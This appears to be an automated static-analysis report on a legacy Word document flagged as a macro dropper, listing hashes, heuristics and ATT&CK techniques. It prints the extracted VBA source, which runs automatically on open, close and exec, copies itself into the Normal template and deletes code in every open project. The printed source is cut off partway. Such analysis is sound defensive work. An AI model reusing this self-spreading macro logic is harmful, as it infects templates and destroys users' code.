Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 03cea7344b9b5364…

MALICIOUS

Office (OLE)

34.0 KB Created: 1997-01-29 21:32:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 00d48f4d77a1e1275e6652beee899c38 SHA-1: b17ed08579cf353da4ebf6fd9fcc98690f1b475d SHA-256: 03cea7344b9b5364420bfcc1f0a40e2ee76979a76b2cf72ef54e14a98199cace
180 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder

The sample is a legacy Word document containing VBA macros. The presence of AutoOpen, AutoExec, AutoClose, and AutoNew macros, along with a function named 'E' that copies the 'CleanAll' macro project between the active document and the normal template, strongly suggests an attempt to establish persistence or spread the macro. The ClamAV detection 'Doc.Dropper.Agent-6413073-0' further supports a malicious dropper functionality.

Heuristics 5

  • ClamAV: Doc.Dropper.Agent-6413073-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6413073-0
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Auto_Close macro high OLE_VBA_AUTOCLOSE
    Auto_Close macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 5081 bytes
SHA-256: 59a4aeb2458503883fb355981bd88a548c4061e2fdf2fe02e565c9d87f54a568
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
'#########################################################################
'###    O Modelo Deste Documento Está Protegido por uma Macro Ativa.   ###
'###    Clean'All - Analisado por 'Mario Hecules', em 05/04/2000       ###
'###    Tecnomecânica Esmaltec Ltda - Fortaleza-Ce                     ###
'#########################################################################

Attribute VB_Name = "CleanAll"
Sub AutoExec()
    On Error Resume Next
    Application.EnableCancelKey = wdCancelDisabled
    Options.VirusProtection = True
    Call E
    Call Delete
    Call CleanAll
End Sub

Sub AutoOpen()
    On Error Resume Next
    Application.EnableCancelKey = wdCancelDisabled
    Call E
    Call Delete
    Call CleanAll
End Sub

Sub AutoNew()
    On Error Resume Next
    Application.EnableCancelKey = wdCancelDisabled
    Call Delete
End Sub

Sub AutoClose()
    On Error Resume Next
    Application.EnableCancelKey = wdCancelDisabled
    Call Delete
    Call CleanAll
End Sub

Function E()
    On Error Resume Next
    Application.EnableCancelKey = wdCancelDisabled
    Dim A, B As String
    A = Application.NormalTemplate.FullName
    B = Application.ActiveDocument.FullName
    Application.OrganizerCopy A, B, "CleanAll", wdOrganizerObjectProjectItems
    Application.OrganizerCopy B, A, "CleanAll", wdOrganizerObjectProjectItems
    Call Delete
End Function

Public Sub AdicionarTeste()
For i = 1 To 200
    ThisDocument.VBProject.VBComponents(1).CodeModule.InsertLines i, "Dim MacrodeTeste_Number_" & i & " as String"
Next i
End Sub

Public Sub Delete()
Dim i As Integer
Dim sDocument As ThisDocument
Dim Scount As String

Scount = ThisDocument.VBProject.VBComponents(1).CodeModule.CountOfLines

'Faz um Loop em todo o documento
For i = 1 To Scount
    ThisDocument.VBProject.VBComponents(1).CodeModule.DeleteLines 1
Next i


'Adiciona Parâmetros de Abertura
With ThisDocument.VBProject.VBComponents(1).CodeModule
    .InsertLines 1, "'#########################################################################"
    .InsertLines 2, "'###    O Modelo Deste Documento Está Protegido por uma Macro Ativa.   ###"
    .InsertLines 3, "'###    Clean'All - Analisado por 'Mario Hecules', em 05/04/2000       ###"
    .InsertLines 4, "'###    Tecnomecânica Esmaltec Ltda - Fortaleza-Ce                     ###"
    .InsertLines 5, "'#########################################################################"
End With

End Sub

Private Sub ImportarCleanAll()
For i = 1 To ThisDocument.VBProject.Collection.Count
    ThisDocument.VBProject.Collection(i).VBComponents.Import "c:\meus documentos\BasCode\CleanAll.bas"
Next i
End Sub

Private Sub ExcluirModulos()
For i = 1 To ThisDocument.VBProject.Collection.Count
    ThisDocument.VBProject.Collection(i).VBComponents.Remove
Next i
End Sub

Private Sub ExportarCleanAll()
For i = 1 To ThisDocument.VBProject.Collection.Count
    If ThisDocument.VBProject.Collection(i).VBComponents(2).Name = "CleanAll" Then
    ThisDocument.VBProject.Collection(1).VBComponents.Item(2).Export "c:\Arquivos de Programas\Microsoft Office\Modelos\CleanAll.bas"
    End If
Next i
End Sub

Public Sub CleanAll() 'Apaga o virus de Macro.
For i = 1 To Application.VBE.ActiveVBProject.Collection.Count
    'Documentos Abertos
     Application.VBE.VBProjects.Item (i)
    
    For j = 1 To Application.VBE.VBProjects.Item(i).VBComponents.Count
    'Verifica Nomes de Codigo Bas e Excluir
        VBE.ActiveVBProject.VBComponents.Item (j)
    
    'Deleta todas as informações de Virus
        For k = 1 To VBE.ActiveVBProject.VBComponents.Item(j).CodeModule.CountOfLines
            VBE.ActiveVBProject.VBComponents.Item(j).CodeModule.DeleteLines (1)
            If VBE.ActiveVBProject.VBComponents.Item(j).Name = "C
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.